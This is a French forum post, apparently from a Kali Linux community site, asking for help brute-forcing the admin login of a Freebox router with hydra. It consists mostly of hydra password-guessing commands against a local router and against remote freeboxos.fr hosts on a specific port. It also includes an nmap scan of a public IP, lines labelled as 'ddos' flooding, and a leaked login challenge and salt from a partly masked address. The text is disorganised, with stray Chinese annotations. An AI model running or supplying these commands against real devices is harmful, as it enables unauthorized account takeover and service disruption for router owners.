Hydra routeur attack ” freebox ” – Kali-linux.fr

Salut tout le monde !  oui c'est moi aprés une longue absence des platform linux   je suis de retour ^^

En ce moment je me suis orienté vers hydra pour essayé de trouver le mot de passe d'acces au routeur ( et non pas au réseaux, j'y suis déja )
tout d'abord il y a l'adresse du routeur sur le réseau : 192.168.1.254

le code source de la page du login qui nous intéraisse c'est  :

<form id="login-form" method="POST" action="/">
<input type="text" style="display: none;" value="freebox" name="login"></input>
<input id="fbx-password" class="password" type="password" name="password" value=""></input>
</div>
</form>

résultat des courses : on a pas besoins de login donc : -l ""
la méthode = post : http_post_form

au final j'ai le code suivant :
hydra -l "" -P /usr/share/wordlists/nmap2.lst -t 1 -f -v -V 192.168.1.254 http-post-form /:password=^PASS^:index.php
donc   nouvelle version online et correct

dabord il faut nmap -p- 91.168.99.0/32 -Pn

hydra -l "" -P /usr/share/wordlists/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 http-post-form /:password=^PASS^:login.php:"Identifiants incorrects"

hydra -l "" -P /usr/share/wordlists/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 http-post-form "/:password=^PASS^:login.php:Identifiants incorrects"    (test good no result)

hydra -l "" -P /usr/share/wordlists/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 -O http-post-form "/:login.php:password=^PASS^:Identifiants incorrects"      （-s表示端口 ；-O表示加密）--ddos

apres  comme ddos hydra -l "" -P /usr/share/wordlists/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 http-post-form /:password=^PASS^:login.php    (5m/s send aux freebox)

Le probléme c'est que dés que je lance hydra, le premier pass qui est dans la liste de mot de passe me retourne " 1 of 1 target successfully completed, 1 valid password found " alors que c'est pas le bon  

qu'en pensez vous ? j'ai une petite idée que le modem retourne toujours le code 200 et non pas le 403 pour erreur ce qui fait que hydra pense avoir trouvé le bon mot de passe.

Merci.

http://91.xxx.99.xxx:33839/api/v8/login

{"success":true,"result":{"logged_in":false,"challenge":"lWuTRdbsj2kmy3d45WAiXYRlWM6tsmIh","password_salt":"Gyovy+WiZH3jm7miT\/N1tuxoWzKlSTA2","password_set":true}}